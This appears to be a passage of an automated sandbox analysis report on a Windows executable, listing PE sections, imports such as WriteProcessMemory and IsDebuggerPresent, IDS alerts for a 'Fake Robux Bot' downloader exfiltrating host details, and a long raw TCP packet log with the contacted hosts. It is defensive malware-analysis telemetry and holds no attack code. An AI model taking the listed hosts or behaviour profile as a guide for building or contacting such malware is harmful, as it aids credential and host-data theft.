                                                                        .text0x10000xf8f00xfa00d05f3e0ef5e377621c91f3cb80223cdfFalse0.565984375data6.469437482287219IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x110000x9eb60xa000f4582f22af46589d667e651f5e207a60False0.42392578125data4.676414080434842IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x1b0000x1d180xc00993da647dd641fbaf36929931af98c97False0.14811197916666666data2.176154310106065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .pdata0x1d0000x10d40x1200bdb3494ff026aa3585ed240d4c64ac2bFalse0.4509548611111111data4.701942526719369IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        _RDATA0x1f0000x1f40x20023a8daedd110b0d61c8a6ead752e7726False0.5234375data3.701987968012486IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x200000x1e00x200045453f3484a5fb7bc6b7c8c2c73748fFalse0.525390625data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x210000x6800x800aaf1d03126560bb69ac2675415c6536fFalse0.49560546875data4.923722535135499IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_MANIFEST0x200600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllWriteProcessMemory, GetCurrentProcess, WaitForSingleObject, MultiByteToWideChar, Sleep, CloseHandle, LoadLibraryW, GetProcAddress, CreateProcessA, WriteConsoleW, CreateFileW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx
                                                                        USER32.dllMessageBoxA

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-10-15T16:00:07.194122+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549769185.199.110.133443TCP
                                                                        2024-10-15T16:00:08.400543+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549774185.199.110.133443TCP
                                                                        2024-10-15T16:00:23.523479+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.549860162.159.138.232443TCP
                                                                        2024-10-15T16:00:40.331436+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.549952162.159.138.232443TCP
                                                                        2024-10-15T16:00:47.351688+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.549990162.159.138.232443TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 15, 2024 16:00:01.165427923 CEST4973680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:01.170383930 CEST8049736185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:01.170458078 CEST4973680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:01.173451900 CEST4973680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:01.178296089 CEST8049736185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:02.197869062 CEST8049736185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:02.197904110 CEST8049736185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:02.197964907 CEST4973680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:02.198005915 CEST8049736185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:02.198115110 CEST4973680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:02.198616982 CEST8049736185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:02.198672056 CEST4973680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:02.209836006 CEST4973680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:02.215312004 CEST8049736185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:02.217295885 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:02.217333078 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:02.217401981 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:02.246663094 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:02.246685982 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:02.875057936 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:02.875212908 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:02.877211094 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:02.877223969 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:02.877511978 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:02.887914896 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:02.935406923 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.140134096 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.140336037 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.140417099 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.140420914 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.140450954 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.140598059 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.140611887 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.140768051 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.140815020 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.140822887 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.141011953 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.141062975 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.141068935 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.196091890 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.196122885 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.242960930 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.266086102 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.266258955 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.266311884 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.266324997 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.266537905 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.266582966 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.266591072 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.266685963 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.266731024 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.266736031 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.266829014 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.266880989 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.266886950 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.267548084 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.267630100 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.267637014 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.267793894 CEST44349741185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:03.267853022 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:03.342869043 CEST49741443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:06.290124893 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:06.290168047 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:06.290275097 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:06.290688992 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:06.290704966 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:06.922300100 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:06.923949957 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:06.923976898 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.194132090 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.194318056 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.194356918 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.194396019 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.194417953 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.194454908 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.194469929 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.197509050 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.197541952 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.197556973 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.197566986 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.197616100 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.200858116 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.242896080 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.311866045 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.311956882 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.311994076 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.312047005 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.312047958 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.312064886 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.312092066 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.312700987 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.314394951 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.314403057 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.315397024 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.315576077 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.315583944 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.360198975 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.360502005 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.360519886 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.414786100 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.429666042 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.429757118 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.429827929 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.429864883 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.429899931 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.429919004 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.429954052 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.429954052 CEST44349769185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.430008888 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.451875925 CEST49769443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.478038073 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.478112936 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:07.478185892 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.478591919 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:07.478610039 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.092036009 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.093481064 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.093528986 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.400599003 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.400727034 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.400768042 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.400789022 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.400808096 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.400823116 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.400851011 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.401309967 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.401360035 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.401377916 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.401660919 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.401700974 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.401700974 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.401715040 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.401817083 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.521337032 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.521456957 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.521495104 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.521524906 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.521557093 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.521600962 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.521955967 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.522028923 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.522066116 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.522072077 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.522079945 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.522114038 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.522753954 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.571079016 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.571098089 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.617913961 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.638706923 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.639062881 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.639133930 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.639147043 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.639362097 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.639427900 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.639436007 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.639863014 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.639914989 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.639921904 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.640149117 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.640208960 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.640216112 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.680391073 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.724112034 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.724292040 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.724342108 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.724361897 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.756978989 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.757016897 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.757040977 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.757055044 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.757091999 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.757127047 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.757133961 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.757172108 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.757607937 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.805381060 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.805397034 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.806237936 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.806288958 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.806298018 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.806454897 CEST44349774185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:08.806504011 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:08.817863941 CEST49774443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:22.664740086 CEST49860443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:22.664779902 CEST44349860162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:22.665030003 CEST49860443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:22.665433884 CEST49860443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:22.665445089 CEST44349860162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:23.277307034 CEST44349860162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:23.277401924 CEST49860443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:23.280417919 CEST49860443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:23.280427933 CEST44349860162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:23.280998945 CEST44349860162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:23.282064915 CEST49860443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:23.327405930 CEST44349860162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:23.327462912 CEST49860443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:23.327478886 CEST44349860162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:23.516618013 CEST4986880192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:23.521557093 CEST8049868172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:23.521684885 CEST4986880192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:23.523515940 CEST44349860162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:23.523633003 CEST44349860162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:23.523840904 CEST49860443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:23.524663925 CEST4986880192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:23.529495955 CEST8049868172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:23.531187057 CEST49860443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:24.148631096 CEST8049868172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:24.150943041 CEST49870443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:24.150984049 CEST44349870172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:24.151282072 CEST49870443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:24.154709101 CEST49870443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:24.154722929 CEST44349870172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:24.195877075 CEST4986880192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:24.780107021 CEST44349870172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:24.780181885 CEST49870443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:24.782856941 CEST49870443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:24.782864094 CEST44349870172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:24.783114910 CEST44349870172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:24.791460037 CEST49870443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:24.835407972 CEST44349870172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:24.962083101 CEST44349870172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:24.962165117 CEST44349870172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:24.962275982 CEST49870443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:24.976214886 CEST49870443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:24.988048077 CEST4987680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:24.992959023 CEST8049876185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:24.993060112 CEST4987680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:24.993500948 CEST4987680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:24.998262882 CEST8049876185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:25.588880062 CEST8049876185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:25.589199066 CEST4987680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:25.589885950 CEST8049876185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:25.590182066 CEST4987680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:25.590225935 CEST49881443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:25.590267897 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:25.590329885 CEST49881443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:25.590889931 CEST49881443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:25.590900898 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:25.594103098 CEST8049876185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:26.836373091 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:26.836431026 CEST49881443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:26.898859978 CEST49881443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:26.898886919 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:26.899275064 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:26.902172089 CEST49881443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:26.943448067 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:27.029915094 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:27.029990911 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:27.030019999 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:27.030035019 CEST49881443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:27.030047894 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:27.030082941 CEST49881443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:27.030086994 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:27.030100107 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:27.030318975 CEST44349881185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:27.030335903 CEST49881443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:27.030360937 CEST49881443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:27.070588112 CEST49881443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:31.135313034 CEST4990780192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:31.140285015 CEST8049907172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:31.140388966 CEST4990780192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:31.141161919 CEST4990780192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:31.145919085 CEST8049907172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:31.760209084 CEST8049907172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:31.803468943 CEST49910443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:31.803524017 CEST44349910172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:31.803653002 CEST49910443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:31.805185080 CEST4990780192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:31.853353024 CEST49910443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:31.853382111 CEST44349910172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:32.472709894 CEST44349910172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:32.472794056 CEST49910443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:32.474525928 CEST49910443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:32.474549055 CEST44349910172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:32.474930048 CEST44349910172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:32.481456041 CEST49910443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:32.527396917 CEST44349910172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:32.619313002 CEST44349910172.67.19.24192.168.2.5
